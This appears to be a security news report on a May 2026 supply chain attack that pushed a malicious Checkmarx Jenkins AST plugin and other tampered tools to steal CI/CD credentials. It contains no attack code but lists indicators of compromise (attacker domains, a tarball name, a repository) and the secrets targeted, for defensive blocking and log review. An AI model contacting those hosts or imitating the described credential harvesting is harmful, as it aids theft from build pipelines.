Critical Checkmarx Plugin Vulnerability Exposed Jenkins AST Users
Key Takeaways A malicious version of the Checkmarx Jenkins AST plugin (version 2026.5.09) was distributed via the Jenkins Marketplace, exposing CI/CD pipelines to credential theft. This incident is...
Key Takeaways
- A malicious version of the Checkmarx Jenkins AST plugin (version 2026.5.09) was distributed via the Jenkins Marketplace, exposing CI/CD pipelines to credential theft.
- This incident is part of a broader supply chain attack by the threat actor TeamPCP, originating from a compromise of the Trivy scanner and Checkmarx’s GitHub repositories.
- The attack aimed to exfiltrate sensitive credentials and secrets, including GitHub tokens, cloud credentials (AWS, Azure, Google Cloud), Kubernetes tokens, SSH keys, and Docker registry credentials.
- Organizations that downloaded and used the malicious plugin between May 9, 2026, 01:25 UTC, and May 10, 2026, 08:47 UTC, are at risk.
- Checkmarx has removed the compromised plugin and is working on a clean replacement. Immediate mitigation steps, including credential rotation and network blocking, are strongly advised.
A recent, sophisticated supply chain attack has targeted a widely used application security tool, Checkmarx, through its Jenkins AST plugin. In May 2026, a malicious iteration of the plugin, version 2026.5.09, was covertly published to the Jenkins Marketplace. This compromise opened development pipelines to potential credential theft and unauthorized access, as detailed in a comprehensive report.
Table Of Content
The incident has been linked to the threat actor known as TeamPCP. Their earlier compromise of the open-source Trivy scanner initiated a cascading series of events with far-reaching implications across the software development ecosystem.
The Chronology of a Supply Chain Breach
The attack unfolded over several weeks, beginning on March 23, 2026. Attackers successfully injected malicious code directly into Checkmarx’s GitHub repository. This initial breach is believed to stem from credentials acquired during TeamPCP’s earlier supply chain compromise of the Trivy scanner, an incident the security community had identified on March 19 as a potential vector for harvesting credentials from downstream users and their connected systems. Analysts at Checkmarx have since traced the likely attack path back to this initial Trivy compromise, concluding that the stolen credentials facilitated unauthorized access to their GitHub environment. Once inside, the attackers manipulated internal repositories, embedding malicious code into critical artifacts distributed to developers globally.
The Jenkins Plugin Compromise
The campaign rapidly escalated into a multi-stage operation. A second wave of malicious artifacts appeared on April 22, 2026, suggesting that the attackers either maintained or regained access despite initial containment efforts. Subsequently, on April 25, the cybercriminal group LAPSUS$ publicized data stolen from Checkmarx’s GitHub repositories on the dark web, nearly a month after the suspected data exfiltration on March 30.
The full extent of the compromise became apparent in May when the tampered Jenkins AST plugin, version 2026.5.09, was uploaded to the Jenkins Marketplace. This provided the attackers with a new and dangerous foothold within CI/CD pipelines worldwide. The malicious plugin was engineered to mimic legitimate functionality, making detection challenging for development teams during routine pipeline executions. The exposure window for this specific plugin extended from May 9, 2026, at 01:25 UTC, to May 10, 2026, at 08:47 UTC.
Any organization that downloaded and integrated this specific plugin version into an active build pipeline during the aforementioned period may have been compromised. Checkmarx confirmed that the last known secure version was 2.0.13-829.vc72453fa_1c16, released in December 2025. Teams operating this version or any prior release are not considered affected by this particular phase of the attack. Checkmarx has acted swiftly to remove the malicious plugin and is in the process of releasing a verified, clean replacement. Organizations relying on automated plugin updates face heightened risk, as the compromised version could have been silently integrated without any apparent changes to their build configurations.
KICS and the Broader Artifact Exposure
The April offensive simultaneously impacted a wider array of developer tools. The public KICS Docker image on DockerHub was compromised between April 22, 2026, 12:31 UTC, and 12:59 UTC. On the same day, the ast-github-action was tampered with between 14:17 and 15:41 UTC. Furthermore, malicious versions of the VS Code extensions for Checkmarx AST results and Developer Assist were distributed across both the Microsoft and Open VSX marketplaces.
The investigation revealed that the primary objective of the malicious code was the collection and attempted exfiltration of sensitive credentials and secrets from affected development environments. The targeted data included GitHub personal access tokens, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes service account tokens, SSH keys, and Docker registry credentials.
What You Should Do
- Immediately block outbound access to
checkmarx.cxandaudit.checkmarx.cxat the network perimeter. - Rotate all potentially exposed credentials, including GitHub personal access tokens, cloud credentials (AWS, Azure, Google Cloud), Kubernetes service account tokens, SSH keys, and Docker registry credentials.
- Pin all development tools and dependencies to verified SHA hashes to prevent silent updates to malicious versions.
- Disable automatic update features for all IDE extensions, especially those related to Checkmarx products.
- Review CI/CD logs for any references to suspicious files like
tpcp.tar.gz, attacker-controlled domains such ascheckmarx.zone, or unexpected repositories liketpcp-docs. - Verify the integrity of all Checkmarx plugins and extensions against the last known safe version (2.0.13-829.vc72453fa_1c16 for Jenkins AST plugin) or official, remediated releases.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.